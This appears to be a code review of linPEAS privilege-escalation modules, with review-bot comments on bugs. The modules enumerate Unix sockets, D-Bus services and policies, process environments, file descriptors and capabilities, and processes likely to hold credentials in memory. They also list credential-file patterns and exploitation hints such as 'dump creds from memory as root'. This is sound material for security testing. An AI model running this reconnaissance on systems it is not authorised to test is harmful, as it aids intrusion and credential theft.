if ! [ "$IAMROOT" ]; then
if ! [ "$SEARCH_IN_FOLDER" ]; then
print_2title "Unix Sockets Analysis"
print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sockets"
# Function to get socket permissions
get_socket_perms() {
local socket="$1"
local perms=""
# Check read permission
if [ -r "$socket" ]; then
perms="Read "
fi
# Check write permission
if [ -w "$socket" ]; then
perms="${perms}Write "
fi
# Check execute permission
if [ -x "$socket" ]; then
perms="${perms}Execute "
fi
# Check socket mode
local mode=$(stat -c "%a" "$socket" 2>/dev/null)
if [ "$mode" = "777" ] || [ "$mode" = "666" ]; then
perms="${perms}(Weak Permissions: $mode) "
fi
echo "$perms"
}
# Function to check socket connectivity
check_socket_connectivity() {
local socket="$1"
local perms="$2"
if [ "$EXTRA_CHECKS" ] && command -v curl >/dev/null 2>&1; then
# Try to connect to the socket
if curl -v --unix-socket "$socket" --max-time 1 http:/linpeas 2>&1 | grep -iq "Permission denied"; then
perms="${perms} - Cannot Connect"
else
perms="${perms} - Can Connect"
fi
fi
echo "$perms"
}
# Function to analyze socket protocol
analyze_socket_protocol() {
local socket="$1"
local owner="$2"
local response=""
# Try to get HTTP response
if command -v curl >/dev/null 2>&1; then
response=$(curl --max-time 2 --unix-socket "$socket" http:/index 2>/dev/null)
if [ $? -eq 0 ]; then
echo " └─ HTTP Socket (owned by $owner):" | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g"
echo " └─ Response to /index (limit 30):"
echo "$response" | head -n 30 | sed 's/^/ /'
fi
fi
}
# Function to get socket owner and group
get_socket_owner() {
local socket="$1"
local owner=""
local group=""
if [ -e "$socket" ]; then
owner=$(ls -l "$socket" 2>/dev/null | awk '{print $3}')
group=$(ls -l "$socket" 2>/dev/null | awk '{print $4}')
echo "$owner:$group"
fi
}
# Collect listening sockets using multiple methods
unix_scks_list=""
for cmd in "ss -xlp -H state listening" "ss -l -p -A 'unix'" "netstat -a -p --unix"; do
if [ -z "$unix_scks_list" ]; then
unix_scks_list=$($cmd 2>/dev/null | grep -Eo "/[a-zA-Z0-9\._/\-]+" | grep -v " " | sort -u)
fi
done
# Get additional socket information
if [ -z "$unix_scks_list" ]; then
unix_scks_list=$(lsof -U 2>/dev/null | awk '{print $9}' | grep "/" | sort -u)
fi
# Find socket files
if ! [ "$SEARCH_IN_FOLDER" ]; then
unix_scks_list2=$(find / -type s 2>/dev/null)
else
unix_scks_list2=$(find "$SEARCH_IN_FOLDER" -type s 2>/dev/null)
fi
# Process all found sockets
(printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2") | sort -u | while read -r socket; do
if [ -n "$socket" ] && [ -e "$socket" ]; then
# Get socket information
perms=$(get_socket_perms "$socket")
perms=$(check_socket_connectivity "$socket" "$perms")
owner_info=$(get_socket_owner "$socket")
# Print socket information
if [ -z "$perms" ]; then
echo "$socket" | sed -${E} "s,$socket,${SED_GREEN},g"
else
echo "$socket" | sed -${E} "s,$socket,${SED_RED},g"
echo " └─(${RED}${perms}${NC})" | sed -${E} "s,Cannot Connect,${SED_GREEN},g"
# Analyze socket protocol if we can connect
if echo "$perms" | grep -q "Can Connect"; then
analyze_socket_protocol "$socket" "$owner_info"
fi
# Highlight dangerous ownership
if echo "$owner_info" | grep -q "root"; then
echo " └─(${RED}Owned by root${NC})"
fi
fi
fi
done
fi
echo ""
fi
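Review bot: `check_socket_connectivity` reports "Can Connect" for every failure that is not an explicit "Permission denied": a socket with no listener, a refused connection, or curl timing out all land in the `else` branch, so the "Can Connect" marker and the follow-up HTTP probe in `analyze_socket_protocol` are triggered for sockets the current user cannot actually use. Decide on curl's exit status, or on "Connected to" in the `-v` output, and keep the "Permission denied" match only as the explicit denied case. Smaller points: `[ -x "$socket" ]` has no meaning for a socket inode and only adds noise to `perms`; `if [ $? -eq 0 ]` after `response=$(curl ...)` works but reads more clearly as `if response=$(curl ...); then`; and `find / -type s` runs unconditionally on every invocation, which is slow on large filesystems and arguably belongs behind `$EXTRA_CHECKS` like the connectivity test.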

@ -0,0 +1,253 @@
# Title: Processes & Cron & Services & Timers - D-Bus Analysis
# ID: PR_DBus_analysis
# Author: Carlos Polop
# Last Update: 2024-03-19
# Description: Comprehensive D-Bus analysis for privilege escalation vectors:
# - D-Bus Service Objects enumeration
# - D-Bus Service Object permissions and ownership
# - D-Bus Configuration files analysis
# - D-Bus Policy analysis
# - D-Bus Method and Interface analysis
# - D-Bus Privilege Escalation Vectors
# License: GNU GPL
# Version: 1.3
# Functions Used: print_2title, print_3title, print_info, echo_not_found
# Global Variables: $IAMROOT, $mygroups, $nosh_usrs, $SEARCH_IN_FOLDER, $sh_usrs, $USER, $dbuslistG, $knw_usrs, $rootcommon, $SED_RED, $SED_GREEN, $SED_BLUE, $SED_LIGHT_CYAN, $SED_LIGHT_MAGENTA, $NC
# Initial Functions:
# Generated Global Variables: $dbuslist, $srvc_object, $genpol, $userpol, $grppol, $dangerous_service, $pattern, $dir, $weak_policies, $dangerous_services, $dangerous, $dbussrvc_object, $patterns, $methods, $file, $dbusservice, $session_services, $prop, $dangerous_session_services, $interface, $dangerous_methods, $dbus_file, $dbus_service, $method, $dangerous_patterns, $properties, $interfaces, $dangerous_props, $service, $info, $allow_rules
# Fat linpeas: 0
# Small linpeas: 1
if ! [ "$SEARCH_IN_FOLDER" ]; then
print_2title "D-Bus Analysis"
print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#d-bus"
# Function to check for dangerous methods
check_dangerous_methods() {
service="$1"
interface="$2"
dangerous=0
dangerous_methods=""
# Common dangerous method patterns - using space-separated string instead of array
patterns="StartUnit StopUnit RestartUnit EnableUnit DisableUnit SetProperty SetUser SetPassword CreateUser DeleteUser ModifyUser Execute Run Spawn Shell Command Exec Authenticate Login Logout Reboot Shutdown PowerOff Suspend Hibernate Update Install Uninstall Configure Modify Change Delete Remove Add Create Write Read Access Grant Revoke Allow Deny"
# Get methods for the interface
methods=$(busctl introspect "$service" "$interface" 2>/dev/null | grep "method" | awk '{print $2}')
# Check each method against dangerous patterns
for method in $methods; do
for pattern in $patterns; do
if echo "$method" | grep -qi "$pattern"; then
dangerous=1
dangerous_methods="${dangerous_methods}${method} "
fi
done
done
if [ "$dangerous" -eq 1 ]; then
echo " └─(${RED}Potentially dangerous methods found${NC})"
echo " └─ $dangerous_methods" | sed 's/^/ /'
fi
return $dangerous
}
# Function to check for dangerous properties
check_dangerous_properties() {
service="$1"
interface="$2"
dangerous=0
dangerous_props=""
# Common dangerous property patterns - using space-separated string instead of array
patterns="Executable Command Path User Group Permission Access Auth Password Secret Key Token Credential Config Setting Policy Rule Allow Deny Write Read Execute"
# Get properties for the interface
properties=$(busctl introspect "$service" "$interface" 2>/dev/null | grep "property" | awk '{print $2}')
# Check each property against dangerous patterns
for prop in $properties; do
for pattern in $patterns; do
if echo "$prop" | grep -qi "$pattern"; then
dangerous=1
dangerous_props="${dangerous_props}${prop} "
fi
done
done
if [ "$dangerous" -eq 1 ]; then
echo " └─(${RED}Potentially dangerous properties found${NC})"
echo " └─ $dangerous_props" | sed 's/^/ /'
fi
return $dangerous
}
# Function to analyze service object
analyze_service_object() {
dbusservice="$1"
info=""
dangerous=0
# Get service status
info=$(busctl status "$dbusservice" 2>/dev/null)
# Check for root ownership
if echo "$info" | grep -qE "^(UID|EUID|OwnerUID)=0"; then
echo " └─(${RED}Running as root${NC})"
dangerous=1
fi
# Get service interfaces
interfaces=$(busctl tree "$dbusservice" 2>/dev/null)
if [ -n "$interfaces" ]; then
echo " └─ Interfaces:"
echo "$interfaces" | sed 's/^/ /'
# Check each interface for dangerous methods and properties
echo "$interfaces" | while read -r interface; do
if [ -n "$interface" ]; then
if check_dangerous_methods "$dbusservice" "$interface"; then
dangerous=1
fi
if check_dangerous_properties "$dbusservice" "$interface"; then
dangerous=1
fi
fi
done
fi
# Check for known dangerous services - using space-separated string instead of array
dangerous_services="org.freedesktop.systemd1 org.freedesktop.PolicyKit1 org.freedesktop.Accounts org.freedesktop.login1 org.freedesktop.hostname1 org.freedesktop.timedate1 org.freedesktop.locale1 org.freedesktop.machine1 org.freedesktop.portable1 org.freedesktop.resolve1 org.freedesktop.timesync1 org.freedesktop.import1 org.freedesktop.export1 org.gnome.SettingsDaemon org.gnome.Shell org.gnome.SessionManager org.gnome.DisplayManager org.gnome.ScreenSaver"
for dangerous_service in $dangerous_services; do
if echo "$dbusservice" | grep -qi "$dangerous_service"; then
echo " └─(${RED}Known dangerous service: $dangerous_service${NC})"
dangerous=1
fi
done
# If service is dangerous, provide exploitation hints
if [ "$dangerous" -eq 1 ]; then
echo " └─(${RED}Potential privilege escalation vector${NC})"
echo " └─ Try: busctl call $dbusservice / [Interface] [Method] [Arguments]"
echo " └─ Or: dbus-send --session --dest=$dbusservice / [Interface] [Method] [Arguments]"
fi
}
# Function to analyze policy file
analyze_policy_file() {
file="$1"
weak_policies=0
# Check file permissions
if ! [ "$IAMROOT" ] && [ -w "$file" ]; then
echo " └─(${RED}Writable policy file${NC})"
weak_policies=$((weak_policies + 1))
fi
# Check general policy
genpol=$(grep "<policy>" "$file" 2>/dev/null)
if [ -n "$genpol" ]; then
echo " └─(${RED}Weak general policy found${NC})"
echo " └─ $genpol" | sed 's/^/ /'
weak_policies=$((weak_policies + 1))
fi
# Check user policies
userpol=$(grep "<policy user=" "$file" 2>/dev/null | grep -v "root")
if [ -n "$userpol" ]; then
echo " └─(${RED}Weak user policy found${NC})"
echo " └─ $userpol" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g"
weak_policies=$((weak_policies + 1))
fi
# Check group policies
grppol=$(grep "<policy group=" "$file" 2>/dev/null | grep -v "root")
if [ -n "$grppol" ]; then
echo " └─(${RED}Weak group policy found${NC})"
echo " └─ $grppol" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"
weak_policies=$((weak_policies + 1))
fi
# Check for allow rules in default context
allow_rules=$(grep -A 5 "context=\"default\"" "$file" 2>/dev/null | grep "allow")
if [ -n "$allow_rules" ]; then
echo " └─(${RED}Allow rules in default context${NC})"
echo " └─ $allow_rules" | sed 's/^/ /'
weak_policies=$((weak_policies + 1))
fi
# Check for specific dangerous policy patterns - using space-separated string instead of array
dangerous_patterns="allow_any allow_all allow_root allow_user allow_group allow_anonymous allow_any_user allow_any_group allow_any_uid allow_any_gid allow_any_pid allow_any_connection allow_any_method allow_any_property allow_any_signal allow_any_interface allow_any_path allow_any_destination allow_any_sender allow_any_receiver"
for pattern in $dangerous_patterns; do
if grep -qi "$pattern" "$file" 2>/dev/null; then
echo " └─(${RED}Dangerous policy pattern found: $pattern${NC})"
weak_policies=$((weak_policies + 1))
fi
done
return $weak_policies
}
# Analyze D-Bus Service Objects
dbuslist=$(busctl list 2>/dev/null)
if [ -n "$dbuslist" ]; then
echo "$dbuslist" | while read -r dbus_service; do
# Print service name with highlighting
echo "$dbus_service" | sed -${E} "s,$dbuslistG,${SED_GREEN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
# Analyze service if it's not in the known list
if ! echo "$dbus_service" | grep -qE "$dbuslistG"; then
dbussrvc_object=$(echo "$dbus_service" | cut -d " " -f1)
analyze_service_object "$dbussrvc_object"
fi
done
else
echo_not_found "busctl"
fi
# Analyze D-Bus Configuration Files
if [ "$PSTORAGE_DBUS" ]; then
echo ""
print_2title "D-Bus Configuration Files"
echo "$PSTORAGE_DBUS" | while read -r dir; do
for dbus_file in "$dir"/*; do
if [ -f "$dbus_file" ]; then
echo "Analyzing $dbus_file:"
if analyze_policy_file "$dbus_file"; then
echo " └─(${RED}Multiple weak policies found${NC})"
fi
fi
done
done
fi
# Check for D-Bus session bus
if command -v dbus-send >/dev/null 2>&1; then
echo ""
print_3title "D-Bus Session Bus Analysis"
if dbus-send --session --dest=org.freedesktop.DBus --type=method_call --print-reply /org/freedesktop/DBus org.freedesktop.DBus.ListNames 2>/dev/null | grep -q "Error"; then
echo "(${RED}No access to session bus${NC})"
else
echo "(${GREEN}Access to session bus available${NC})"
# List available services on session bus
session_services=$(dbus-send --session --dest=org.freedesktop.DBus --type=method_call --print-reply /org/freedesktop/DBus org.freedesktop.DBus.ListNames 2>/dev/null | grep "string" | sed 's/^/ /')
echo "$session_services"
# Check for known dangerous session services - using space-separated string instead of array
dangerous_session_services="org.gnome.SettingsDaemon org.gnome.Shell org.gnome.SessionManager org.gnome.DisplayManager org.gnome.ScreenSaver org.freedesktop.Notifications org.freedesktop.ScreenSaver org.freedesktop.PowerManagement org.freedesktop.UPower org.freedesktop.NetworkManager org.freedesktop.Avahi org.freedesktop.UDisks2 org.freedesktop.ModemManager1 org.freedesktop.PackageKit org.freedesktop.PolicyKit1 org.freedesktop.systemd1 org.freedesktop.Accounts org.freedesktop.login1"
for dangerous_service in $dangerous_session_services; do
if echo "$session_services" | grep -qi "$dangerous_service"; then
echo " └─(${RED}Known dangerous session service: $dangerous_service${NC})"
echo " └─ Try: dbus-send --session --dest=$dangerous_service / [Interface] [Method] [Arguments]"
fi
done
fi
fi
fi
echo ""
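Review bot: The return-value convention is inverted in two places, so the verdicts are backwards. `check_dangerous_methods` and `check_dangerous_properties` end with `return $dangerous`, i.e. exit status 1 when something was found, but the callers in `analyze_service_object` use `if check_dangerous_methods "$dbusservice" "$interface"; then dangerous=1`, which only runs when the function returned 0 (nothing found). Likewise `analyze_policy_file` returns `$weak_policies` and the caller prints "Multiple weak policies found" inside `if analyze_policy_file "$dbus_file"; then`, which is true only when the count is 0. Make the functions return 0 when a finding exists, or echo the count and compare it explicitly. Also, `busctl tree "$dbusservice"` prints object paths with tree-drawing prefixes (for example `├─/org/freedesktop/...`), not interface names, so the lines passed as `$interface` to `busctl introspect` are neither valid object paths nor interfaces and the introspection silently returns nothing; and the `dangerous=1` assignments inside `echo "$interfaces" | while read -r interface` run in a subshell and never reach the final "Potential privilege escalation vector" decision, so that verdict currently depends only on the `busctl status` UID check and the known-service name list.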

@ -0,0 +1,265 @@
# Title: Processes & Cron & Services & Timers - List processes
# ID: PR_List_processes
# Author: Carlos Polop
# Last Update: 2024-03-19
# Description: List running processes and check for unusual configurations
# License: GNU GPL
# Version: 1.4
# Functions Used: print_2title, print_info, print_ps
# Global Variables: $capsB, $knw_usrs, $nosh_usrs, $NOUSEPS, $processesB, $processesDump, $processesVB, $rootcommon, $SEARCH_IN_FOLDER, $sh_usrs, $USER, $Wfolders
# Initial Functions:
# Generated Global Variables: $pslist, $cpid, $caphex, $psline, $pid, $selinux_ctx, $current_env_vars, $env_findings, $apparmor_profile, $mount, $mount_findings, $fd_findings, $proc_cmd, $proc_user, $mount_point, $current_mounts, $fd_target, $var, $findings, $sec_findings, $proc_env_vars, $fd_count, $proc_mounts, $$escaped_var
# Fat linpeas: 0
# Small linpeas: 1
if ! [ "$SEARCH_IN_FOLDER" ]; then
print_2title "Running processes (cleaned)"
if [ "$NOUSEPS" ]; then
printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC
fi
print_info "Check weird & unexpected processes run by root: https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#processes"
if [ -f "/etc/fstab" ] && cat /etc/fstab | grep -q "hidepid=2"; then
echo "Looks like /etc/fstab has hidepid=2, so ps will not show processes of other users"
fi
# Get current process environment variables
if [ -r "/proc/self/environ" ]; then
current_env_vars=$(cat /proc/self/environ 2>/dev/null | tr '\0' '\n' | sort)
else
current_env_vars=$(env 2>/dev/null | sort)
fi
# Get current process mounts
if [ -r "/proc/self/mountinfo" ]; then
current_mounts=$(cat /proc/self/mountinfo 2>/dev/null | sort)
else
current_mounts=$(mount 2>/dev/null | sort)
fi
# Function to check for unusual environment variables
check_env_vars() {
local pid="$1"
local proc_user="$2"
local proc_cmd="$3"
local findings=""
# Skip if we can't read the environment
[ ! -r "/proc/$pid/environ" ] && return
# Get process environment variables
proc_env_vars=$(cat "/proc/$pid/environ" 2>/dev/null | tr '\0' '\n' | sort)
[ -z "$proc_env_vars" ] && return
# Find environment variables that the target process has but we don't
if [ -n "$current_env_vars" ]; then
echo "$proc_env_vars" | while read -r var; do
if [ -n "$var" ]; then
# Escape special regex characters in var
escaped_var=$(echo "$var" | sed 's/[][^$.*+?(){}|]/\\&/g')
if ! echo "$current_env_vars" | grep -q "^$escaped_var$"; then
if [ -z "$findings" ]; then
findings="Has additional environment variables:"
fi
findings="$findings\n └─ $var"
fi
fi
done
else
# If we can't get current env vars, just show all process env vars
findings="Has environment variables:"
echo "$proc_env_vars" | while read -r var; do
if [ -n "$var" ]; then
findings="$findings\n └─ $var"
fi
done
fi
# Return findings if any
if [ -n "$findings" ]; then
echo "$findings"
fi
}
# Function to check for unusual security contexts
check_security_context() {
local pid="$1"
local proc_user="$2"
local proc_cmd="$3"
local findings=""
# Check SELinux context
if [ -r "/proc/$pid/attr/current" ]; then
selinux_ctx=$(cat "/proc/$pid/attr/current" 2>/dev/null)
if [ -n "$selinux_ctx" ] && [ "$selinux_ctx" != "unconfined" ]; then
findings="SELinux context: $selinux_ctx"
fi
fi
# Check AppArmor profile
if [ -r "/proc/$pid/attr/apparmor/current" ]; then
apparmor_profile=$(cat "/proc/$pid/attr/apparmor/current" 2>/dev/null)
if [ -n "$apparmor_profile" ] && [ "$apparmor_profile" != "unconfined" ]; then
if [ -n "$findings" ]; then
findings="$findings\n └─ AppArmor profile: $apparmor_profile"
else
findings="AppArmor profile: $apparmor_profile"
fi
fi
fi
# Return findings if any
if [ -n "$findings" ]; then
echo "$findings"
fi
}
# Function to check for unusual mount namespaces
check_mount_namespace() {
local pid="$1"
local proc_user="$2"
local proc_cmd="$3"
local findings=""
# Skip if we can't read the mountinfo
[ ! -r "/proc/$pid/mountinfo" ] && return
# Get process mounts
proc_mounts=$(cat "/proc/$pid/mountinfo" 2>/dev/null | sort)
[ -z "$proc_mounts" ] && return
# Find mounts that the target process has but we don't
if [ -n "$current_mounts" ]; then
echo "$proc_mounts" | while read -r mount; do
if [ -n "$mount" ] && ! echo "$current_mounts" | grep -q "^$mount$"; then
mount_point=$(echo "$mount" | sed "s,.* - \(.*\),\1,")
if [ -z "$findings" ]; then
findings="Has additional mounts:"
fi
findings="$findings\n └─ $mount_point"
fi
done
else
# If we can't get current mounts, just show all process mounts
findings="Has mounts:"
echo "$proc_mounts" | while read -r mount; do
if [ -n "$mount" ]; then
mount_point=$(echo "$mount" | sed "s,.* - \(.*\),\1,")
findings="$findings\n └─ $mount_point"
fi
done
fi
# Return findings if any
if [ -n "$findings" ]; then
echo "$findings"
fi
}
# Function to check for unusual file descriptors
check_file_descriptors() {
local pid="$1"
local proc_user="$2"
local proc_cmd="$3"
local findings=""
# Skip if we can't read the file descriptors
[ ! -r "/proc/$pid/fd" ] && return
# Check for interesting file descriptors
for fd in /proc/$pid/fd/*; do
# Skip if fd doesn't exist or we can't access it
[ ! -e "$fd" ] && continue
# Get fd target
fd_target=$(readlink "$fd" 2>/dev/null)
[ -z "$fd_target" ] && continue
# Skip if target doesn't exist
[ ! -e "$fd_target" ] && continue
# Check if we can access the FD but not the target file
if [ -r "$fd" ] && [ ! -r "$fd_target" ]; then
if [ -z "$findings" ]; then
findings="Readable FD to unreadable file: $fd -> $fd_target"
else
findings="$findings\n └─ Readable FD to unreadable file: $fd -> $fd_target"
fi
fi
if [ -w "$fd" ] && [ ! -w "$fd_target" ]; then
if [ -z "$findings" ]; then
findings="Writable FD to unwritable file: $fd -> $fd_target"
else
findings="$findings\n └─ Writable FD to unwritable file: $fd -> $fd_target"
fi
fi
done
# Check for unusual number of file descriptors
fd_count=$(ls -1 "/proc/$pid/fd" 2>/dev/null | wc -l)
[ -z "$fd_count" ] && return
# If process has more than 100 file descriptors, it might be interesting
if [ "$fd_count" -gt 100 ]; then
if [ -z "$findings" ]; then
findings="Unusual number of FDs: $fd_count"
else
findings="$findings\n └─ Unusual number of FDs: $fd_count"
fi
fi
# Return findings if any
if [ -n "$findings" ]; then
echo "$findings"
fi
}
if [ "$NOUSEPS" ]; then
print_ps | grep -v 'sed-Es' | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED},"
pslist=$(print_ps)
else
(ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do
echo "$psline" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED},"
if [ "$(command -v capsh || echo -n '')" ] && ! echo "$psline" | grep -q "root"; then
cpid=$(echo "$psline" | awk '{print $2}')
caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')"
if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then
printf " └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E} "s,$capsB,${SED_RED},g"
fi
fi
done
pslist=$(ps auxwww)
echo ""
fi
# Additional checks for each process
print_2title "Processes with unusual configurations"
for pid in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+' -printf "%f\n" 2>/dev/null); do
# Skip if process doesn't exist or we can't access it
[ ! -d "/proc/$pid" ] && continue
# Get process user and command
proc_user=$(stat -c '%U' "/proc/$pid" 2>/dev/null)
proc_cmd=$(cat "/proc/$pid/cmdline" 2>/dev/null | tr '\0' ' ' | head -c 100)
[ -z "$proc_user" ] || [ -z "$proc_cmd" ] && continue
# Run all checks and collect findings
sec_findings=$(check_security_context "$pid" "$proc_user" "$proc_cmd")
mount_findings=$(check_mount_namespace "$pid" "$proc_user" "$proc_cmd")
fd_findings=$(check_file_descriptors "$pid" "$proc_user" "$proc_cmd")
env_findings=$(check_env_vars "$pid" "$proc_user" "$proc_cmd")
# If any findings exist, print process info and findings
if [ -n "$env_findings" ] || [ -n "$sec_findings" ] || [ -n "$mount_findings" ] || [ -n "$fd_findings" ]; then
echo "Process $pid ($proc_user) - $proc_cmd"
[ -n "$env_findings" ] && echo "$env_findings"
[ -n "$sec_findings" ] && echo "$sec_findings"
[ -n "$mount_findings" ] && echo "$mount_findings"
[ -n "$fd_findings" ] && echo "$fd_findings"
echo ""
fi
done
echo ""
fi
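Review bot: `check_env_vars` and `check_mount_namespace` can never report the "additional" variant: inside `echo "$proc_env_vars" | while read -r var; do` and `echo "$proc_mounts" | while read -r mount; do`, the assignments to `findings` happen in the pipe's subshell, so when the loop finishes `findings` is still empty and the final `if [ -n "$findings" ]` prints nothing (the fallback branches that preset `findings="Has environment variables:"` print only that header for the same reason). Either print the lines directly from inside the loop, or run the loop in the parent shell with a here-document (`done <<EOF`) so `findings` survives. Two smaller points: the `"$selinux_ctx" != "unconfined"` comparison in `check_security_context` flags every process on an SELinux host, because `/proc/$pid/attr/current` there holds a full label such as `unconfined_u:unconfined_r:unconfined_t:s0` rather than the word `unconfined`, so it should be compared against the current process's own context instead; and the "Generated Global Variables" header lists `$$escaped_var` (typo for `$escaped_var`), which is also never declared `local`.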

@ -0,0 +1,103 @@
# Title: Processes & Cron & Services & Timers - Processes with credentials inside memory
# ID: PR_Process_cred_in_memory
# Author: Carlos Polop
# Last Update: 2024-03-19
# Description: Processes with credentials inside memory and memory-mapped files
# License: GNU GPL
# Version: 1.2
# Functions Used: echo_not_found, print_2title, print_info
# Global Variables: $pslist, $SEARCH_IN_FOLDER, $processesDump, $nosh_usrs, $processesB, $knw_usrs, $rootcommon, $sh_usrs, $processesVB
# Initial Functions:
# Generated Global Variables: $line, $cred_files, $filename, $fd_target, $found_cred_files, $proc, $proc_cmd, $pid, $proc_user, $cred_processes, $seen_files
# Fat linpeas: 0
# Small linpeas: 1
if ! [ "$SEARCH_IN_FOLDER" ]; then
print_2title "Processes with credentials in memory (root req)"
print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#credentials-from-process-memory"
# Common credential-storing processes
cred_processes="gdm-password gnome-keyring-daemon lightdm vsftpd apache2 sshd: mysql postgres redis-server mongod memcached elasticsearch jenkins tomcat nginx php-fpm supervisord vncserver xrdp teamviewer"
# Check for credential-storing processes
for proc in $cred_processes; do
if echo "$pslist" | grep -q "$proc"; then
echo "$proc process found (dump creds from memory as root)" | sed "s,$proc,${SED_RED},"
else
echo_not_found "$proc"
fi
done
# Check for processes with open handles to credential files
echo ""
print_2title "Opened Files by processes"
for pid in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+' -printf "%f\n" 2>/dev/null); do
# Skip if process doesn't exist or we can't access it
[ ! -d "/proc/$pid" ] && continue
[ ! -r "/proc/$pid/fd" ] && continue
# Get process user and command
proc_user=$(stat -c '%U' "/proc/$pid" 2>/dev/null)
proc_cmd=$(cat "/proc/$pid/cmdline" 2>/dev/null | tr '\0' ' ' | head -c 100)
[ -z "$proc_user" ] || [ -z "$proc_cmd" ] && continue
# Skip processes that start with "sed " or contain "linpeas.sh"
echo "$proc_cmd" | grep -q "^sed " && continue
echo "$proc_cmd" | grep -q "linpeas.sh" && continue
# Variable to store unique files for this process
seen_files=""
found_cred_files=""
# Check for open credential files
for fd in /proc/$pid/fd/*; do
[ ! -e "$fd" ] && continue
fd_target=$(readlink "$fd" 2>/dev/null)
[ -z "$fd_target" ] && continue
[ "$fd_target" = "/dev/null" ] && continue
echo "$fd_target" | grep -q "^socket:" && continue
echo "$fd_target" | grep -q "^anon_inode:" && continue
# Only add if not already seen (using case to check)
case " $seen_files " in
*" $fd_target "*) continue ;;
*)
seen_files="$seen_files $fd_target"
if [ -z "$found_cred_files" ]; then
echo "Process $pid ($proc_user) - $proc_cmd"
echo " └─ Has open files:"
found_cred_files="yes"
fi
echo " └─ $fd_target"
;;
esac
done
done | sed -${E} "s,\.(pem|key|cred|db|sqlite|conf|cnf|ini|env|secret|token|auth|passwd|shadow)$,\1${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED},"
# Check for processes with memory-mapped files that might contain credentials
echo ""
print_2title "Processes with memory-mapped credential files"
for pid in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+' -printf "%f\n" 2>/dev/null); do
# Skip if process doesn't exist or we can't access it
[ ! -d "/proc/$pid" ] && continue
[ ! -r "/proc/$pid/maps" ] && continue
# Get process user and command
proc_user=$(stat -c '%U' "/proc/$pid" 2>/dev/null)
proc_cmd=$(cat "/proc/$pid/cmdline" 2>/dev/null | tr '\0' ' ' | head -c 100)
[ -z "$proc_user" ] || [ -z "$proc_cmd" ] && continue
# Check for memory-mapped files that might contain credentials
cred_files=$(grep -E '\.(pem|key|cred|db|sqlite|conf|cnf|ini|env|secret|token|auth|passwd|shadow)$' "/proc/$pid/maps" 2>/dev/null)
if [ -n "$cred_files" ]; then
echo "Process $pid ($proc_user) - $proc_cmd"
echo " └─ Has memory-mapped credential files:"
echo "$cred_files" | while read -r line; do
filename=$(echo "$line" | sed "s,.*/\(.*\),\1,")
echo " └─ $filename"
done
fi
done
echo ""
fi
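Review bot: the `\1` in the first sed of the highlighting pipeline after the "Opened Files by processes" loop (`s,\.(pem|key|...)$,\1${SED_RED},g`) re-emits the captured extension in front of the highlighted match, so a file called `id.pem` comes out as `idpem` followed by the coloured `.pem`; every other sed in the same pipeline relies on `${SED_RED}` alone to keep the matched text, so drop the `\1`. Two smaller points: that loop prints every open descriptor of every readable process (only /dev/null, sockets and anon inodes are skipped), which is not what the `found_cred_files` name and the module description promise, so either filter `$fd_target` against the same extension list the sed uses or rename the variable and the sub-title; and `$fd`, the inner loop variable, is missing from the "Generated Global Variables" header line.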


@ -0,0 +1,56 @@
